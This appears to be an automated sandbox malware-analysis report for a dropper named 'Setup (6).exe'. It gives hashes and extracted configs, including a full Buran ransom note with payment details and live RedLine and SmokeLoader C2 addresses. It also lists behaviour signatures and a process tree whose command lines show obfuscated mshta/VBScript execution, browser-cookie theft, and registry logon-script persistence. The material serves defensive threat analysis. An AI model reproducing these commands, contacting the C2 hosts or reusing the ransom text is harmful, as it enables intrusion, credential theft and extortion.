Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    548s
  • max time network
    1793s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    22-08-2021 21:19

General

  • Target

    Setup (6).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 590$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? payfast290@mail2tor.com TELEGRAM @ payfast290 Your personal ID: 215-18E-098 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

redline

Botnet

v1

C2

195.2.78.163:25450

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 41 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 23 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 14 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 15 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 33 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 31 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 11 IoCs
  • Modifies system certificate store 2 TTPs 24 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 44 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup (6).exe
    "C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4532
    • C:\Users\Admin\Documents\Ldz7Qajd7UnKE4M6LIOUYCzz.exe
      "C:\Users\Admin\Documents\Ldz7Qajd7UnKE4M6LIOUYCzz.exe"
      2⤵
      • Executes dropped EXE
      PID:1376
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 292
        3⤵
        • Suspicious use of NtCreateProcessExOtherParentProcess
        • Program crash
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:4604
    • C:\Users\Admin\Documents\c7il0IGbf1lUz8BNEK25eVhE.exe
      "C:\Users\Admin\Documents\c7il0IGbf1lUz8BNEK25eVhE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:1372
      • C:\Users\Admin\Documents\c7il0IGbf1lUz8BNEK25eVhE.exe
        C:\Users\Admin\Documents\c7il0IGbf1lUz8BNEK25eVhE.exe
        3⤵
        • Executes dropped EXE
        PID:3428
      • C:\Users\Admin\Documents\c7il0IGbf1lUz8BNEK25eVhE.exe
        C:\Users\Admin\Documents\c7il0IGbf1lUz8BNEK25eVhE.exe
        3⤵
        • Executes dropped EXE
        PID:4912
    • C:\Users\Admin\Documents\FXQgYxEJSJAMSM17Nt_gNdRU.exe
      "C:\Users\Admin\Documents\FXQgYxEJSJAMSM17Nt_gNdRU.exe"
      2⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:1252
    • C:\Users\Admin\Documents\Vzz_4xEWSHJd9RMsrFOe01n6.exe
      "C:\Users\Admin\Documents\Vzz_4xEWSHJd9RMsrFOe01n6.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      PID:2264
    • C:\Users\Admin\Documents\2nEvTMKoXw5ysXV26qDt4iCN.exe
      "C:\Users\Admin\Documents\2nEvTMKoXw5ysXV26qDt4iCN.exe"
      2⤵
      • Executes dropped EXE
      PID:1860
    • C:\Users\Admin\Documents\q3kErU0rKpc3Wb2iosHyk7CZ.exe
      "C:\Users\Admin\Documents\q3kErU0rKpc3Wb2iosHyk7CZ.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:1768
      • C:\Users\Admin\Documents\q3kErU0rKpc3Wb2iosHyk7CZ.exe
        "C:\Users\Admin\Documents\q3kErU0rKpc3Wb2iosHyk7CZ.exe"
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:4600
    • C:\Users\Admin\Documents\9hoDIOlzizxOQbxuP2WoKdse.exe
      "C:\Users\Admin\Documents\9hoDIOlzizxOQbxuP2WoKdse.exe"
      2⤵
      • Executes dropped EXE
      PID:1608
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 316
        3⤵
        • Program crash
        PID:5572
    • C:\Users\Admin\Documents\oH9QXzSaqxhICKtphf7xrb1C.exe
      "C:\Users\Admin\Documents\oH9QXzSaqxhICKtphf7xrb1C.exe"
      2⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1612
    • C:\Users\Admin\Documents\MKQenCEy_rZWjnhZ2BHMcyIK.exe
      "C:\Users\Admin\Documents\MKQenCEy_rZWjnhZ2BHMcyIK.exe"
      2⤵
      • Executes dropped EXE
      PID:3832
      • C:\Users\Admin\Documents\MKQenCEy_rZWjnhZ2BHMcyIK.exe
        C:\Users\Admin\Documents\MKQenCEy_rZWjnhZ2BHMcyIK.exe
        3⤵
          PID:8
      • C:\Users\Admin\Documents\XRlD46SD8WZmHpAuFiz7RXtN.exe
        "C:\Users\Admin\Documents\XRlD46SD8WZmHpAuFiz7RXtN.exe"
        2⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:4700
      • C:\Users\Admin\Documents\hvhegLWiizm7dlouolbPGoFl.exe
        "C:\Users\Admin\Documents\hvhegLWiizm7dlouolbPGoFl.exe"
        2⤵
        • Executes dropped EXE
        PID:2408
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 316
          3⤵
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
      • C:\Users\Admin\Documents\9sQ9YB_Zin_nT1V1VZiRpR5I.exe
        "C:\Users\Admin\Documents\9sQ9YB_Zin_nT1V1VZiRpR5I.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2372
        • C:\Users\Admin\Documents\9sQ9YB_Zin_nT1V1VZiRpR5I.exe
          "C:\Users\Admin\Documents\9sQ9YB_Zin_nT1V1VZiRpR5I.exe"
          3⤵
          • Executes dropped EXE
          PID:5480
      • C:\Users\Admin\Documents\fi_aWUxh240EfWKJPfablklj.exe
        "C:\Users\Admin\Documents\fi_aWUxh240EfWKJPfablklj.exe"
        2⤵
        • Executes dropped EXE
        PID:2740
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\fi_aWUxh240EfWKJPfablklj.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\fi_aWUxh240EfWKJPfablklj.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
          3⤵
            PID:4812
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\fi_aWUxh240EfWKJPfablklj.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\fi_aWUxh240EfWKJPfablklj.exe" ) do taskkill -f -iM "%~NxA"
              4⤵
                PID:1268
                • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                  hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                  5⤵
                  • Executes dropped EXE
                  PID:5204
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                    6⤵
                      PID:5428
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                        7⤵
                          PID:6100
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                        6⤵
                        • Loads dropped DLL
                        PID:2500
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill -f -iM "fi_aWUxh240EfWKJPfablklj.exe"
                      5⤵
                      • Kills process with taskkill
                      PID:5500
              • C:\Users\Admin\Documents\zDqD_kfn_9YRc80DlO4F0QBU.exe
                "C:\Users\Admin\Documents\zDqD_kfn_9YRc80DlO4F0QBU.exe"
                2⤵
                • Executes dropped EXE
                PID:612
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 296
                  3⤵
                  • Program crash
                  PID:3820
              • C:\Users\Admin\Documents\D4XXF8ahzQnwMJYH0WEKa4Hw.exe
                "C:\Users\Admin\Documents\D4XXF8ahzQnwMJYH0WEKa4Hw.exe"
                2⤵
                • Executes dropped EXE
                PID:4656
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 280
                  3⤵
                  • Program crash
                  • Enumerates system info in registry
                  PID:5040
              • C:\Users\Admin\Documents\GniNj3BXJFR7sFn4bD83qzcW.exe
                "C:\Users\Admin\Documents\GniNj3BXJFR7sFn4bD83qzcW.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4164
                • C:\Users\Admin\Documents\GniNj3BXJFR7sFn4bD83qzcW.exe
                  C:\Users\Admin\Documents\GniNj3BXJFR7sFn4bD83qzcW.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4252
                • C:\Users\Admin\Documents\GniNj3BXJFR7sFn4bD83qzcW.exe
                  C:\Users\Admin\Documents\GniNj3BXJFR7sFn4bD83qzcW.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3012
              • C:\Users\Admin\Documents\iQoQqoEbfc4_dphH2VzFgVkN.exe
                "C:\Users\Admin\Documents\iQoQqoEbfc4_dphH2VzFgVkN.exe"
                2⤵
                • Executes dropped EXE
                PID:4240
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 236
                  3⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5216
              • C:\Users\Admin\Documents\7wZncnHyHn6dyGJiQ9Opl4YD.exe
                "C:\Users\Admin\Documents\7wZncnHyHn6dyGJiQ9Opl4YD.exe"
                2⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:4072
              • C:\Users\Admin\Documents\o9mjABJsMg15fp1s2ZON6247.exe
                "C:\Users\Admin\Documents\o9mjABJsMg15fp1s2ZON6247.exe"
                2⤵
                • Executes dropped EXE
                PID:1000
                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:4012
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                    • Executes dropped EXE
                    PID:5024
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                    • Executes dropped EXE
                    PID:936
                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                  3⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  PID:4448
                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2532
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                    • Executes dropped EXE
                    PID:5560
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                    • Executes dropped EXE
                    PID:1960
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                    • Executes dropped EXE
                    PID:6124
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                    • Executes dropped EXE
                    PID:5976
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    4⤵
                      PID:6076
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      4⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:6320
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      4⤵
                        PID:1732
                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        4⤵
                          PID:4460
                    • C:\Users\Admin\Documents\0lIT7a6yfSltb7vPM9q1SDhA.exe
                      "C:\Users\Admin\Documents\0lIT7a6yfSltb7vPM9q1SDhA.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:3216
                    • C:\Users\Admin\Documents\81eYo8DsToKAab2VVn1jNY9a.exe
                      "C:\Users\Admin\Documents\81eYo8DsToKAab2VVn1jNY9a.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4464
                      • C:\Users\Admin\AppData\Roaming\6001524.exe
                        "C:\Users\Admin\AppData\Roaming\6001524.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5464
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -u -p 5464 -s 2312
                          4⤵
                          • Program crash
                          PID:6088
                      • C:\Users\Admin\AppData\Roaming\4091446.exe
                        "C:\Users\Admin\AppData\Roaming\4091446.exe"
                        3⤵
                          PID:5876
                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:1328
                        • C:\Users\Admin\AppData\Roaming\4737508.exe
                          "C:\Users\Admin\AppData\Roaming\4737508.exe"
                          3⤵
                            PID:6032
                          • C:\Users\Admin\AppData\Roaming\1954642.exe
                            "C:\Users\Admin\AppData\Roaming\1954642.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:5140
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 2452
                              4⤵
                              • Program crash
                              PID:6508
                        • C:\Users\Admin\Documents\v1UXlBtONAK3JRMBHyVizWo0.exe
                          "C:\Users\Admin\Documents\v1UXlBtONAK3JRMBHyVizWo0.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:4140
                        • C:\Users\Admin\Documents\72m4D2gCxvUkH8zauFPlJmId.exe
                          "C:\Users\Admin\Documents\72m4D2gCxvUkH8zauFPlJmId.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2176
                          • C:\Users\Admin\AppData\Local\Temp\is-QQNBC.tmp\72m4D2gCxvUkH8zauFPlJmId.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-QQNBC.tmp\72m4D2gCxvUkH8zauFPlJmId.tmp" /SL5="$102C8,138429,56832,C:\Users\Admin\Documents\72m4D2gCxvUkH8zauFPlJmId.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of FindShellTrayWindow
                            PID:3760
                            • C:\Users\Admin\AppData\Local\Temp\is-LVHCM.tmp\Setup.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-LVHCM.tmp\Setup.exe" /Verysilent
                              4⤵
                              • Executes dropped EXE
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3820
                              • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                5⤵
                                • Executes dropped EXE
                                PID:5364
                                • C:\Users\Admin\AppData\Local\Temp\is-UAKKV.tmp\Inlog.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-UAKKV.tmp\Inlog.tmp" /SL5="$20218,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of FindShellTrayWindow
                                  PID:3832
                                  • C:\Users\Admin\AppData\Local\Temp\is-FJ7R6.tmp\Setup.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-FJ7R6.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                    7⤵
                                      PID:4376
                                      • C:\Users\Admin\AppData\Local\Temp\is-6QJ4V.tmp\Setup.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-6QJ4V.tmp\Setup.tmp" /SL5="$402F6,17352168,721408,C:\Users\Admin\AppData\Local\Temp\is-FJ7R6.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                        8⤵
                                        • Loads dropped DLL
                                        • Suspicious use of FindShellTrayWindow
                                        PID:1548
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-RKGUP.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                          9⤵
                                          • Blocklisted process makes network request
                                          • Suspicious use of SetThreadContext
                                          PID:2372
                                          • C:\Windows\SysWOW64\expand.exe
                                            expand C:\Users\Admin\AppData\Local\Temp\is-RKGUP.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                            10⤵
                                            • Drops file in Windows directory
                                            PID:6696
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                          9⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:5876
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                            10⤵
                                            • Executes dropped EXE
                                            PID:8
                                        • C:\Users\Admin\AppData\Local\Temp\is-RKGUP.tmp\{app}\vdi_compiler.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-RKGUP.tmp\{app}\vdi_compiler"
                                          9⤵
                                            PID:7644
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                            9⤵
                                              PID:7560
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
                                                10⤵
                                                • Adds Run key to start application
                                                • Enumerates system info in registry
                                                • Suspicious use of FindShellTrayWindow
                                                PID:2796
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb4b5346f8,0x7ffb4b534708,0x7ffb4b534718
                                                  11⤵
                                                  • Enumerates system info in registry
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:7376
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
